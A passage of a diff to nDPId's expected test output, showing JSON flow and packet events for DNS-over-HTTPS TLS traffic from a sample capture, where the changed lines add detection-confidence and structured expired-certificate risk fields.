GXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"}
-00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"}
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 03217{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
-00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="}
-01194{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
+01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
